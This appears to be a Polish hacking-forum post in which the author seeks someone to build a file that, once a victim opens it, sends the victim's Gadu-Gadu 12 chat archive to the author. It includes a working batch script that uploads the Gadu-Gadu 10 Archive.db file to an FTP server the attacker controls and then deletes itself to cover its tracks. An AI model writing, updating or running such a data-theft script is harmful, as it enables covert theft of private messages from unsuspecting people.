Poszukuj osoby potraficej zedytowa, bd napisa nowy pliczek, ktry po wysaniu i otworzeniu go przez ofiar wyle mi jego archiwum GG 12 na maila lub klienta ftp. W razie czego prosz o pisanie tutaj albo na pw.

Ten prosty program w bat'ach rzeczywicie dziaa ale tylko w GG 10. Teraz, kiedy wysza nowa wersja troch si pozmieniao.

@echo off

REM haker.edu.pl---------------------------------
set login_ftp=LOGIN_FTP
set haslo_ftp=HASLO_FTP
set serwer_ftp=SERWER_FTP
set gg_10_archiwum=%userprofile%\AppData\Roaming\Gadu-Gadu 10\NUMER_GG\Archive.db
REM ---------------------------------------------

echo %login_ftp%> gg.txt
echo %haslo_ftp%>> gg.txt
echo put "%gg_10_archiwum%">> gg.txt
echo close >> gg.txt
echo bye >> gg.txt

ftp.exe -s:gg.txt %serwer_ftp%

del gg.txt
del %0
exit